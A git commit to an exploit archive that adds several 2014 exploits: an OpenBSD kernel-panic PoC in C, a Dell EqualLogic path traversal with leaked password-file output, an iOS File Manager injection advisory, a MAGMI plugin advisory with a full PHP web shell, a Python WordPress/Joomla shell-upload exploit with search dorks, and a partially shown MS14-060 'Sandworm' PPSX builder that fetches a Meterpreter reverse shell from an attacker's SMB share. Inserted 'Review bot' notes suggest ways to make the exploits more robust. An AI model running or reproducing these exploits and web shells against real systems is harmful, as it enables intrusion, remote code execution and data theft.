Updated 10_27_2014

Offensive Security 2014-10-27 04:48:25 +00:00
parent 72d8ed3f5c
commit 2d32c6c0f9
7 changed files with 879 additions and 0 deletions


@ -31564,3 +31564,9 @@ id,file,description,date,author,platform,type,port
35049,platforms/asp/webapps/35049.txt,"Techno Dreams FAQ Manager Package 1.0 'faqlist.asp' SQL Injection Vulnerability",2010-12-04,R4dc0re,asp,webapps,0
35050,platforms/php/webapps/35050.txt,"Alguest 1.1 'start' Parameter SQL Injection Vulnerability",2010-12-06,"Aliaksandr Hartsuyeu",php,webapps,0
35051,platforms/windows/remote/35051.txt,"Freefloat FTP Server Directory Traversal Vulnerability",2010-12-06,Pr0T3cT10n,windows,remote,0
35052,platforms/php/webapps/35052.txt,"Magento Server MAGMI Plugin - Remote File Inclusion (RFI)",2014-10-25,"Parvinder Bhasin",php,webapps,0
35055,platforms/windows/remote/35055.py,"Windows OLE - Remote Code Execution ""Sandworm"" Exploit (MS14-060)",2014-10-25,"Mike Czumak",windows,remote,0
35056,platforms/hardware/webapps/35056.txt,"Dell EqualLogic Storage - Remote File Inclusion",2014-10-25,"Mauricio Correa",hardware,webapps,0
35057,platforms/php/webapps/35057.py,"Creative Contact Form (Wordpress 0.9.7 and Joomla 2.0.0) - Shell Upload Vulnerability",2014-10-25,"Claudio Viviani",php,webapps,0
35058,platforms/bsd/dos/35058.c,"OpenBSD <= 5.5 - Local Kernel Panic",2014-10-25,nitr0us,bsd,dos,0
35059,platforms/ios/webapps/35059.txt,"File Manager 4.2.10 iOS - Code Execution Vulnerability",2014-10-25,Vulnerability-Lab,ios,webapps,0


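--- a/platforms/bsd/dos/35058.c
+++ b/platforms/bsd/dos/35058.c
@@ -0,0 +1,147 @@
+/*
+* tenochtitlan.c
+*
+* OpenBSD <= 5.5 Local Kernel Panic
+* by Alejandro Hernandez (@nitr0usmx)
+*
+* Advisory and technical details:
+* http://www.ioactive.com/pdfs/IOActive_Advisory_OpenBSD_5_5_Local_Kernel_Panic.pdf
+*
+* Fix: http://www.openbsd.org/errata55.html#013_kernexec
+*
+* This PoC works only for i386.
+*
+* Bug found with Melkor (ELF file format fuzzer)
+* https://github.com/IOActive/Melkor_ELF_Fuzzer
+*
+* Mexico / Oct 2014
+*/
+#include <stdio.h>
+#include <string.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <fcntl.h>
+#include <sys/stat.h>
+#include <sys/mman.h>
+#include <sys/param.h>
+#include <sys/types.h>
+#ifndef __OpenBSD__
+#error "Not an OpenBSD system !!!1111";
+#else
+#include <sys/exec_elf.h>
+#endif
+#ifndef __i386__
+#error "Not an i386 system !!!1111";
+#endif
+// In Aztec mythology, Huitzilopochtli, was a god of war, a sun god,
+// the patron of the city of Tenochtitlan, the Capital of the Aztec Empire.
+const char pyramid[] =
+" _____\n"
+" _|[]_|_\n"
+" _/_/=|_\\_\\_\n"
+" _/_ /==| _\\ _\\_\n"
+" _/__ /===|_ _\\ __\\_\n"
+" _/_ _ /====| ___\\ __\\_\n"
+" _/ __ _/=====|_ ___\\ ___ \\_\n"
+" _/ ___ _/======| ____ \\_ __ \\_\n";
+struct {
+unsigned int idx;
+Elf32_Word p_align;
+} targets[] = {
+{ 6, 0xb16b00b5 }, // ( * )( * )
+{ 6, 0xdeadface },
+{ 4, 0x00001001 },
+{ 0, 0x00000004 }
+};
+int main(int argc, char **argv)
+{
+Elf32_Ehdr *hdr;
+Elf32_Phdr *pht; // Program Header Table
+struct stat statinfo;
+char *elfptr;
+int fd, r;
+if(argc < 2){
+fprintf(stderr, "Usage: %s <elf_executable>\n", argv[0]);
+exit(-1);
+}
+if((fd = open(argv[1], O_RDWR)) == -1){
+perror("open");
+exit(-1);
+}
+if(fstat(fd, &statinfo) == -1){
+perror("stat");
+close(fd);
+exit(-1);
+}
+if((elfptr = (char *) mmap(NULL, statinfo.st_size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0)) == MAP_FAILED){
+perror("mmap");
+close(fd);
+exit(-1);
+}
+hdr = (Elf32_Ehdr *) (elfptr);
+pht = (Elf32_Phdr *) (elfptr + hdr->e_phoff);
+printf("[*] hdr->e_phoff:\t0x%.4x\n", hdr->e_phoff);
+printf("[*] hdr->e_phnum:\t0x%.4x\n", hdr->e_phnum);
+srand(time(NULL));
+r = rand();
+if(r % 3 == 0){
+#ifdef OpenBSD5_5
+pht[targets[0].idx].p_align = targets[0].p_align;
+printf("[*] PHT[%d].p_align = 0x%x\n", targets[0].idx, pht[targets[0].idx].p_align);
+#else // OpenBSD 5.2 didn't panic with 0xb16b00b5 in the last LOAD's p_align
+pht[targets[1].idx].p_align = targets[1].p_align;
+printf("[*] PHT[%d].p_align = 0x%x\n", targets[1].idx, pht[targets[1].idx].p_align);
+#endif
+} else if(r % 3 == 1){
+pht[targets[2].idx].p_align = targets[2].p_align;
+printf("[*] PHT[%d].p_align = 0x%x\n", targets[2].idx, pht[targets[2].idx].p_align);
+} else {
+int p;
+for(p = 0; p < hdr->e_phnum; p++, pht++)
+if(pht->p_type == PT_LOAD){
+pht->p_align = targets[3].p_align;
+printf("[*] PHT[%d].p_align = 0x%x\n", p, pht->p_align);
+}
+}
+// Synchronize the ELF in memory and the file system
+if(msync(elfptr, 0, MS_ASYNC) == -1){
+perror("msync");
+close(fd);
+exit(-1);
+}
+if(munmap(elfptr, statinfo.st_size) == -1){
+perror("munmap");
+close(fd);
+exit(-1);
+}
+close(fd);
+printf("%s", pyramid);
+sleep(1);
+system(argv[1]);
+// Should never reach this point, however sometimes the OS didn't crash with
+// system() until the 2nd execution. Same behavior with execl and execv too.
+printf("... try to execute %s manually.\n", argv[1]);
+return -1;
+}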
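Review bot: The writes `pht[targets[0].idx].p_align`, `pht[targets[1].idx].p_align` and `pht[targets[2].idx].p_align` index the program header table at 6 and 4 without first checking that `hdr->e_phnum` exceeds that index, and nothing verifies that the input is an ELF file or that `e_phoff` plus `e_phnum * sizeof(Elf32_Phdr)` fits inside `statinfo.st_size`, so a small or non-ELF argument makes the PoC write outside the table inside the MAP_SHARED mapping (or outside the mapping altogether) and corrupt the file instead of reproducing the panic. A guard after the mmap such as `if (statinfo.st_size < sizeof(Elf32_Ehdr) || !IS_ELF(*hdr) || hdr->e_phoff + (off_t)hdr->e_phnum * sizeof(Elf32_Phdr) > statinfo.st_size) { fprintf(stderr, "not a usable ELF\n"); exit(-1); }` plus an `hdr->e_phnum > targets[i].idx` test before each indexed write would make the failure explicit. `srand(time(NULL));` calls `time()` with no `#include <time.h>` in the header list, which is an implicit declaration under C99 and later. `msync(elfptr, 0, MS_ASYNC)` passes a length of 0; on OpenBSD that presumably syncs the whole mapping by the historic BSD rule, but `statinfo.st_size` is the portable length and matches the later `munmap` call.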


@ -0,0 +1,53 @@
# Exploit Title: Remote Directory Traversal exploit for Dell EqualLogic 6.0
Storage
# Date: 09/2013
# Exploit Author: Mauricio Pampim Corr?a
# Vendor Homepage: www.dell.com
# Version: 6.0
# Tested on: Equipment Model Dell EqualLogic PS4000
# CVE : CVE-2013-3304
The malicious user sends
GET //../../../../../../../../etc/master.passwd
And the Dell Storage answers
root:[hash] &:/root:/bin/sh
daemon:*:[hash]::0:0:The devil himself:/:/sbin/nologin
operator:*:[hash]::0:0:System &:/usr/guest/operator:/sbin/nologin
bin:*:[hash]::0:0:Binaries Commands and Source:/:/sbin/nologin
sshd:*:[hash]:0:0:SSH pseudo-user:/var/chroot/sshd:/sbin/nologin
uucp:*:[hash]:UNIX-to-UNIX
Copy:/var/spool/uucppublic:/usr/libexec/uucp/uucico
nobody:*:[hash]:Unprivileged user:/nonexistent:/sbin/nologin
grpadmin:[hash]:Group Manager Admin Account:/mgtdb/update:/usr/bin/Cli
authgroup:[hash]:Group Authenication Account:/:/sbin/nologin
More informations in (Br-Portuguese) https://www.xlabs.com.br/blog/?p=50
Could obtain shell with flaw? send me an email telling me how, to
mauricio[at]xlabs.com.br
Thanks

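--- a/platforms/ios/webapps/35059.txt
+++ b/platforms/ios/webapps/35059.txt
@@ -0,0 +1,214 @@
+Document Title:
+===============
+File Manager v4.2.10 iOS - Code Execution Vulnerability
+References (Source):
+====================
+http://www.vulnerability-lab.com/get_content.php?id=1343
+Release Date:
+=============
+2014-10-21
+Vulnerability Laboratory ID (VL-ID):
+====================================
+1343
+Common Vulnerability Scoring System:
+====================================
+9
+Product & Service Introduction:
+===============================
+Try a file manager thats unmatched in functionality and reliability. It was created to manage your cloud services like GoogleDrive, Dropbox,
+Box, OneDrive, Yandex.Disk, and network services like FTP, SFTP, SMB, WebDAV, DLNA, photo galleries and files on your device. Manage all of
+your stored data like sub-folders - copy, move, rename or compress to archive your folders and files. It supports all possible archive
+formats: Zip, Rar, 7z, tar, gz, bz2. You can protect your folders and files with a password and view photo, video and audio content, as well
+as documents. This application will be a great help for everyday tasks. Copy a folder from one cloud service to any other - easy! Quickly move
+a folder from an archive to a cloud service - easy! Copy your gallery to a network or cloud service - easy!
+(Copy of the Homepage: https://itunes.apple.com/de/app/file-manager-pro-manage-your/id926125881 )
+Abstract Advisory Information:
+==============================
+The Vulnerability Laboratory Research team discovered a code execution vulnerability in the official DevelSoftware LTD - File Manager v4.2.10 iOS mobile application.
+Vulnerability Disclosure Timeline:
+==================================
+2014-10-21: Public Disclosure (Vulnerability Laboratory)
+Discovery Status:
+=================
+Published
+Affected Product(s):
+====================
+DevelSoftware LTD
+Product: File Manager - iOS Mobile Web Application (Wifi) 4.2.10
+Exploitation Technique:
+=======================
+Remote
+Severity Level:
+===============
+Critical
+Technical Details & Description:
+================================
+A code execution vulnerability has been discovered in the official DevelSoftware LTD - File Manager v4.2.10 iOS mobile application.
+The issue allows an attacker to compromise the application and connected device components by exploitation of a system specific code
+execution vulnerability in the wifi interface.
+The vulnerability is located in the `Create Folder` input field of the index.html wifi web interface. The function create the path value
+without any protection or filter mechanism in the GET method request. Remote attackers are able to manipulate the GET method request by
+usage of the `createdir?path=` parameter to compromise the application or device. The execution of the code occurs in the index.html file
+next to the name output context of the wifi share file dir listing. The attack vector is located on the application-side of the mobile app
+and the request method to inject is GET.
+The security risk of the remote code execution web vulnerability is estimated as critical with a cvss (common vulnerability scoring system) count of 8.8
+Exploitation of the remote code execution web vulnerability requires no privileged application user account (passwd default blank) or user interaction.
+Successful exploitation of the code execution vulnerability results in mobile application compromise and connected or affected device component compromise.
+Request Method(s):
+[+] GET
+Vulnerable Module(s):
+[+] Create Folder
+Vulnerable Parameter(s):
+[+] createdir?path=(name)
+Affected Module(s):
+[+] Wifi Interface (index.html)
+Proof of Concept (PoC):
+=======================
+The code execution vulnerability can be exploited by attackers in the same local wifi without user interaction or pass code authorization.
+For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
+1. Install the mobile app to your local iOS device (iphone or ipad) [https://itunes.apple.com/de/app/file-manager-pro-manage-your/id926125881]
+2. Start the app and push in the left corner the wifi transfer button
+3. Take another device or computer that allows you to access the wifi file transfer interface (localhost:80)
+4. Now, inject own code as payload by usage of the create folder input field
+Note: The input field requests the path value directly via GET method request without secure parse or encode
+5. The code execution occurs directly after the inject in the index.html file of the web interface
+6. Successful reproduce of the security vulnerability!
+PoC: index.html (Name) [createdir?path=]
+<fieldset class="buttonsFieldset">
+<input disabled="" value="Download Files" class="buttons" id="loadFileButton" onclick="loadFileButtonClick()" type="button">
+<input value="Upload Files" class="buttons" id="uploadFilesButton" onclick="uploadFilesButtonClick()" type="button">
+<input value="Create Folder" class="buttons" id="createFolderButton" onclick="createFolderButtonClick()" type="button">
+<input disabled="" value="Rename" class="buttons" id="renameButton" onclick="renameButtonClick()" type="button">
+<input disabled="" value="Delete" class="buttons" id="deleteButton" onclick="deleteButtonClick()" type="button">
+<input value="Select All" class="buttons" id="selectAllButton" onclick="selectAllButtonClick()" type="button">
+<input value="Deselect All" class="buttons" id="unselectAllButton" onclick="unselectAllButtonClick()" type="button">
+</fieldset>
+<div class="separator"></div>
+<div class="fileListTableContainer">
+<table class="table" id="fileListTable"><tbody><tr id="fileListTable_-1" class="header">
+<td id="fileListTable_-1_0" class="field">Name</td><td id="fileListTable_-1_1" class="field">Ext</td><td id="fileListTable_-1_2" class="field">Size</td></tr>
+<tr index="0" id="fileListTable_0" class="row"><td index="0" field="name" id="fileListTable_0_0" class="cell">>-[CODE EXECUTION VULNERABILITY!]></td>
+<td index="1" field="ext" id="fileListTable_0_1" class="cell">dir</td><td index="2" field="size" id="fileListTable_0_2" class="cell"></td></tr>
+<tr index="1" id="fileListTable_1" class="row"><td index="0" field="name" id="fileListTable_1_0" class="cell">testfolder1</td><td index="1" field="ext"
+id="fileListTable_1_1" class="cell">dir</td><td index="2" field="size" id="fileListTable_1_2" class="cell"></td></tr><tr index="2" id="fileListTable_2"
+class="row"><td index="0" field="name" id="fileListTable_2_0" class="cell">testfolder2</td><td index="1" field="ext" id="fileListTable_2_1"
+class="cell">dir</td><td index="2" field="size" id="fileListTable_2_2" class="cell"></td></tr></tbody></table></div>
+--- PoC Session Logs [GET] ---
+Status: 200[OK]
+GET http://localhost:80/createdir?path=%2F%3E%22%3C-[CODE EXECUTION VULNERABILITY!];%3E Load Flags[LOAD_BACKGROUND ] Größe des Inhalts[43] Mime Type[application/x-unknown-content-type]
+Request Header:
+Host[localhost:80]
+User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
+Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+Accept-Language[de,en-US;q=0.7,en;q=0.3]
+Accept-Encoding[gzip, deflate]
+Referer[http://localhost:80/index.html]
+Connection[keep-alive]
+Response Header:
+Connection[Keep-Alive]
+Content-Length[43]
+Status: 200[OK]
+GET http://localhost:80/-[CODE EXECUTION VULNERABILITY]; Load Flags[LOAD_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[application/x-unknown-content-type]
+Request Header:
+Host[localhost:80]
+User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
+Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+Accept-Language[de,en-US;q=0.7,en;q=0.3]
+Accept-Encoding[gzip, deflate]
+Referer[http://localhost:80/index.html]
+Connection[keep-alive]
+Response Header:
+Connection[Close]
+Date[Sun, 19 Oct 2014 16:22:46 GMT]
+Solution - Fix & Patch:
+=======================
+The vulnerability can be patched by a secure restriction and parse of the create folder input field. Encode also the vulnerable name value in the
+index.html file to prevent application-side code execution attacks.
+Security Risk:
+==============
+The security risk of the code execution web vulnerability in the path value is estimated as critical. (CVSS 8.8)
+Credits & Authors:
+==================
+Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either
+expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers
+are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even
+if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation
+of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break
+any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.
+Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
+Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
+Section: dev.vulnerability-db.com - forum.vulnerability-db.com - magazine.vulnerability-db.com
+Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
+Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
+Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
+Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
+electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
+Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
+is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
+(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
+Copyright © 2014 | Vulnerability Laboratory [Evolution Security]
+--
+VULNERABILITY LABORATORY RESEARCH TEAM
+DOMAIN: www.vulnerability-lab.com
+CONTACT: research@vulnerability-lab.com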

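--- a/platforms/php/webapps/35052.txt
+++ b/platforms/php/webapps/35052.txt
@@ -0,0 +1,48 @@
+Exploit found date: 10/24/2014
+Security Researcher name: Parvinder Singh Bhasin
+Contact info: parvinder.bhasin@gmail.com
+twitter: @parvinderb <scorpio>
+Currently tested version:
+Magento version: Magento CE - 1.8 and newer versions
+MAGMI version: v0.7.17a and greater
+MAGMI (MAGento Mass Importer) suffers from File inclusion vulnerability (RFI) which allows an attacker to upload essentially any PHP file (without any sanity checks). This PHP file could then be used to skim credit card data, rewrite files, run remote commands, delete files..etc. Essentially, this gives attacker ability to execute remote commands on the vulnerable server.
+Even though the plugin is not Magento's own plugin, I feel since Magento's commerce platform is used by many sites for conducting business and that lot of their customers could be using the same plugin, Magento has the responsibility to inform it's paid/unpaid customers of this vulnerability. I would appreciate if my name appears as part of the disclosure.
+Steps to reproduce:
+1. http://<a magentosite.com>/magmi/web/magmi.php
+2. Under upload new plugins:
+click on "choose file"
+MAGento plugins are basically php file zipped. So create a php shell and zip the file. ex: evil.php ex: zip file: evil_plugin.zip. After the file has been uploaded, it will say: Plugin packaged installed.
+evil.php:
+<?php
+if (isset($_POST['command'])){
+echo "<form action='evil.php' method='post'>
+<input type='text' name='command' value=''/>
+<input type='submit' value='execute'/>
+</form>";
+if(function_exists('shell_exec')) {
+$command=$_POST['command'];
+$output = shell_exec("$command");
+echo "<pre>$output</pre>";
+}
+}
+else {
+echo "<form action='evil.php' method='post'>
+<input type='text' name='command' value=''/>
+<input type='submit' value='execute'/>
+</form>";
+}
+?>
+3. Your malicious evil.php file is extracted now. All you then need to do is just access the evil.php page from:
+http://<amagentosite.com>/magmi/plugins/evil.php
+At this point you could really have access to the entire system. Download any malware, install rootkits, skim credit card data ..etc.etc.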

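--- a/platforms/php/webapps/35057.py
+++ b/platforms/php/webapps/35057.py
@@ -0,0 +1,178 @@
+#!/usr/bin/python
+#
+# Exploit Name: Wordpress and Joomla Creative Contact Form Shell Upload Vulnerability
+# Wordpress plugin version: <= 0.9.7
+# Joomla extension version: <= 2.0.0
+#
+# Vulnerability discovered by Gianni Angelozzi
+#
+# Exploit written by Claudio Viviani
+#
+# Dork google wordpress: inurl:inurl:sexy-contact-form
+# Dork google joomla : inurl:com_creativecontactform
+#
+# Tested on BackBox 3.x
+#
+# http connection
+import urllib, urllib2, sys, mimetypes
+# Args management
+import optparse
+# file management
+import os, os.path
+# Check url
+def checkurl(url):
+if url[:8] != "https://" and url[:7] != "http://":
+print('[X] You must insert http:// or https:// procotol')
+sys.exit(1)
+else:
+return url
+# Check if file exists and has readable
+def checkfile(file):
+if not os.path.isfile(file) and not os.access(file, os.R_OK):
+print '[X] '+file+' file is missing or not readable'
+sys.exit(1)
+else:
+return file
+# Get file's mimetype
+def get_content_type(filename):
+return mimetypes.guess_type(filename)[0] or 'application/octet-stream'
+# Create multipart header
+def create_body_sh3ll_upl04d(payloadname):
+getfields = dict()
+payloadcontent = open(payloadname).read()
+LIMIT = '----------lImIt_of_THE_fIle_eW_$'
+CRLF = '\r\n'
+L = []
+for (key, value) in getfields.items():
+L.append('--' + LIMIT)
+L.append('Content-Disposition: form-data; name="%s"' % key)
+L.append('')
+L.append(value)
+L.append('--' + LIMIT)
+L.append('Content-Disposition: form-data; name="%s"; filename="%s"' % ('files[]', payloadname))
+L.append('Content-Type: %s' % get_content_type(payloadname))
+L.append('')
+L.append(payloadcontent)
+L.append('--' + LIMIT + '--')
+L.append('')
+body = CRLF.join(L)
+return body
+banner = """
+___ ___ __ __,-,__
+| Y .-----.----.--| .-----.----.-----.-----. | ' '__|
+|. | | _ | _| _ | _ | _| -__|__ --| | __|
+|. / \ |_____|__| |_____| __|__| |_____|_____| |_______|
+|: | _______ |__| __ |_|
+|::.|:. | | _ .-----.-----.--------| .---.-.
+`--- ---' |___| | _ | _ | | | _ |
+|. | |_____|_____|__|__|__|__|___._|
+|: 1 |
+|::.. . |
+`-------'
+_______ __ __ _______ __ __
+| _ .----.-----.---.-| |_|__.--.--.-----. | _ .-----.-----| |_.---.-.----| |_
+|. 1___| _| -__| _ | _| | | | -__| |. 1___| _ | | _| _ | __| _|
+|. |___|__| |_____|___._|____|__|\___/|_____| |. |___|_____|__|__|____|___._|____|____|
+|: 1 | _______ |: 1 |
+|::.. . | | _ .-----.----.--------. |::.. . |
+`-------' |. 1___| _ | _| | `-------'
+|. __) |_____|__| |__|__|__|
+|: |
+|::.|
+`---'
+Cr3ative C0nt4ct Form Sh3ll Upl04d
+Discovered by:
+Gianni Angelozzi
+Written by:
+Claudio Viviani
+http://www.homelab.it
+info@homelab.it
+homelabit@protonmail.ch
+https://www.facebook.com/homelabit
+https://twitter.com/homelabit
+https://plus.google.com/+HomelabIt1/
+https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
+"""
+commandList = optparse.OptionParser('usage: %prog -t URL -c CMS-f FILENAME.PHP [--timeout sec]')
+commandList.add_option('-t', '--target', action="store",
+help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
+)
+commandList.add_option('-c', '--cms', action="store",
+help="Insert CMS Type: wordpress|joomla",
+)
+commandList.add_option('-f', '--file', action="store",
+help="Insert file name, ex: shell.php",
+)
+commandList.add_option('--timeout', action="store", default=10, type="int",
+help="[Timeout Value] - Default 10",
+)
+options, remainder = commandList.parse_args()
+# Check args
+if not options.target or not options.file or not options.cms:
+print(banner)
+commandList.print_help()
+sys.exit(1)
+payloadname = checkfile(options.file)
+host = checkurl(options.target)
+timeout = options.timeout
+cmstype = options.cms
+print(banner)
+if options.cms == "wordpress":
+url_sexy_upload = host+'/wp-content/plugins/sexy-contact-form/includes/fileupload/index.php'
+backdoor_location = host+'/wp-content/plugins/sexy-contact-form/includes/fileupload/files/'
+elif options.cms == "joomla":
+url_sexy_upload = host+'/components/com_creativecontactform/fileupload/index.php'
+backdoor_location = host+'/components/com_creativecontactform/fileupload/files/'
+else:
+print("[X] -c options require: 'wordpress' or 'joomla'")
+sys.exit(1)
+content_type = 'multipart/form-data; boundary=----------lImIt_of_THE_fIle_eW_$'
+bodyupload = create_body_sh3ll_upl04d(payloadname)
+headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
+'content-type': content_type,
+'content-length': str(len(bodyupload)) }
+try:
+req = urllib2.Request(url_sexy_upload, bodyupload, headers)
+response = urllib2.urlopen(req)
+if "error" in response.read():
+print("[X] Upload Failed :(")
+else:
+print("[!] Shell Uploaded")
+print("[!] "+backdoor_location+options.file)
+except urllib2.HTTPError as e:
+print("[X] Http Error: "+str(e.code))
+except urllib2.URLError as e:
+print("[X] Connection Error: "+str(e.code))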
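Review bot: `timeout = options.timeout` is parsed (with a default and `type="int"`) but never used, so `--timeout` is a no-op and `response = urllib2.urlopen(req)` blocks for the library default; pass it through as `response = urllib2.urlopen(req, timeout=timeout)`. In the last handler, `urllib2.URLError` has no `code` attribute (only `HTTPError` does), so `print("[X] Connection Error: "+str(e.code))` raises an AttributeError that hides the real connection failure; `str(e.reason)` is the attribute that exists on both. In `checkfile`, `not os.path.isfile(file) and not os.access(file, os.R_OK)` only rejects a path that is both missing and unreadable, so an existing but unreadable file passes the check and `open(payloadname).read()` later fails with an unhandled IOError and no file handle cleanup; the two tests should be joined with `or`, and the read belongs in a `with open(payloadname) as fh:` block. The `for (key, value) in getfields.items():` loop in `create_body_sh3ll_upl04d` iterates a dict that is always empty, so either drop it or make `getfields` a parameter with a `None` default.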

platforms/windows/remote/35055.py Executable file

@ -0,0 +1,233 @@
# !/usr/bin/python
# Windows OLE RCE Exploit MS14-060 (CVE-2014-4114) ? Sandworm
# Author: Mike Czumak (T_v3rn1x) - @SecuritySift
# Written: 10/21/2014
# Tested Platform(s): Windows 7 SP1 (w/ exploit script run on Kali Linux)
# You are free to reuse this code in part or in whole with the exception of commercial applications
# For a demo of this PoC, see http://www.securitysift.com/windows-ole-rce-exploit-ms14-060/
import sys, os
import zipfile
import argparse
import subprocess
from shutil import copyfile
from pptx import Presentation
# Args/Usage
def get_args():
parser = argparse.ArgumentParser( prog="ms14_060.py",
formatter_class=lambda prog: argparse.HelpFormatter(prog,max_help_position=50),
epilog= '''This script will build a blank PowerPoint show (ppsx) file to exploit the
OLE Remote Code Execution vulnerability identified as MS14-060 (CVE-2014-4114)
Simply pass filename of resulting PPSX and IP Address of remote machine hosting the
share. You can add content to the PPSX file after it has been created.
The script will also create the INF file and an optional Meterpreter
reverse_tcp executable with the -m switch. Alternatively, you can host your own exectuble payload.
Host the INF and GIF (EXE) in an SMB share called "share".
Note: Requires python-pptx''')
parser.add_argument("filename", help="Name of resulting PPSX exploit file")
parser.add_argument("ip", help="IP Address of Remote machine hosting the share")
parser.add_argument("-m", "--msf", help="Set if you want to create Meterpreter gif executable. Pass port (uses ip arg)")
args = parser.parse_args()
return args
# write file
def write_file(filename, contents):
f = open(filename, "w")
f.write(contents)
f.close()
# build bin
def build_bin(embed, ip, share, file):
bin = "\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1" # ole header
bin = bin + "\x00" * 16
bin = bin + "\x3E\x00\x03\x00\xFE\xFF\x09\x00"
bin = bin + "\x06\x00\x00\x00\x00\x00\x00\x00"
bin = bin + "\x00\x00\x00\x00\x01\x00\x00\x00"
bin = bin + "\x01\x00\x00\x00\x00\x00\x00\x00"
bin = bin + "\x00\x10\x00\x00\x02\x00\x00\x00"
bin = bin + "\x01\x00\x00\x00\xFE\xFF\xFF\xFF"
bin = bin + "\x00\x00\x00\x00\x00\x00\x00\x00"
bin = bin + "\xFF" * 432
bin = bin + "\xFD\xFF\xFF\xFF\xFE\xFF\xFF\xFF"
bin = bin + "\xFE\xFF\xFF\xFF\xFE\xFF\xFF\xFF"
bin = bin + "\xFF" * 496
bin = bin + "\x52\x00\x6F\x00\x6F\x00\x74\x00"
bin = bin + "\x20\x00\x45\x00\x6E\x00\x74\x00"
bin = bin + "\x72\x00\x79\x00\x00\x00\x00\x00"
bin = bin + "\x00" * 40
bin = bin + "\x16\x00\x05\x00\xFF\xFF\xFF\xFF"
bin = bin + "\xFF\xFF\xFF\xFF\x01\x00\x00\x00"
bin = bin + "\x02\x26\x02\x00\x00\x00\x00\x00"
bin = bin + "\xC0\x00\x00\x00\x00\x00\x00\x46"
bin = bin + "\x00" * 12
bin = bin + "\xF0\x75\xFD\x41\x63\xB2\xCF\x01"
bin = bin + "\x03\x00\x00\x00\x40\x00\x00\x00"
bin = bin + "\x00\x00\x00\x00\x01\x00\x4F\x00"
bin = bin + "\x4C\x00\x45\x00\x31\x00\x30\x00"
bin = bin + "\x4E\x00\x61\x00\x74\x00\x69\x00"
bin = bin + "\x76\x00\x65\x00\x00\x00\x00\x00"
bin = bin + "\x00" * 36
bin = bin + "\x1A\x00\x02\x01"
bin = bin + "\xFF" * 12
bin = bin + "\x00" * 40
bin = bin + "\x37"
bin = bin + "\x00" * 75
bin = bin + "\xFF" * 12
bin = bin + "\x00" * 116
bin = bin + "\xFF" * 12
bin = bin + "\x00" * 48
bin = bin + "\xFE"
bin = bin + "\xFF" * 511
bin = bin + "\x33\x00\x00\x00" + embed + "\x00" # 3 EmbeddedStgX.txt
bin = bin + "\x5C\x5C" + ip + "\x5C" + share + "\x5C" + file # \\ip\share\file
bin = bin + "\x00" * 460
return bin
# build ppt/drawings/vmlDrawing1.vml
def build_vml():
xml = '<xml xmlns:v="urn:schemas-microsoft-com:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:p="urn:schemas-microsoft-com:office:powerpoint" xmlns:oa="urn:schemas-microsoft-com:office:activation">'
xml = xml + '<o:shapelayout v:ext="edit"><o:idmap v:ext="edit" data="1"/></o:shapelayout><v:shapetype id="_x0000_t75" coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f">'
xml = xml + '<v:stroke joinstyle="miter"/><v:formulas><v:f eqn="if lineDrawn pixelLineWidth 0"/><v:f eqn="sum @0 1 0"/><v:f eqn="sum 0 0 @1"/><v:f eqn="prod @2 1 2"/><v:f eqn="prod @3 21600 pixelWidth"/><v:f eqn="prod @3 21600 pixelHeight"/><v:f eqn="sum @0 0 1"/>'
xml = xml + '<v:f eqn="prod @6 1 2"/><v:f eqn="prod @7 21600 pixelWidth"/><v:f eqn="sum @8 21600 0"/><v:f eqn="prod @7 21600 pixelHeight"/><v:f eqn="sum @10 21600 0"/></v:formulas>'
xml = xml + '<v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/><o:lock v:ext="edit" aspectratio="t"/></v:shapetype><v:shape id="_x0000_s1026" type="#_x0000_t75" style="position:absolute; left:100pt;top:-100pt;width:30pt;height:30pt"><v:imagedata o:relid="rId1" o:title=""/></v:shape><v:shape id="_x0000_s1027" type="#_x0000_t75" style="position:absolute; left:150pt;top:-100pt;width:30pt;height:30pt">'
xml = xml + '<v:imagedata o:relid="rId2" o:title=""/></v:shape></xml>'
return xml
# build ppt/slides/_rels/slide1.xml.rels
def build_xml_rels(ole1, ole2):
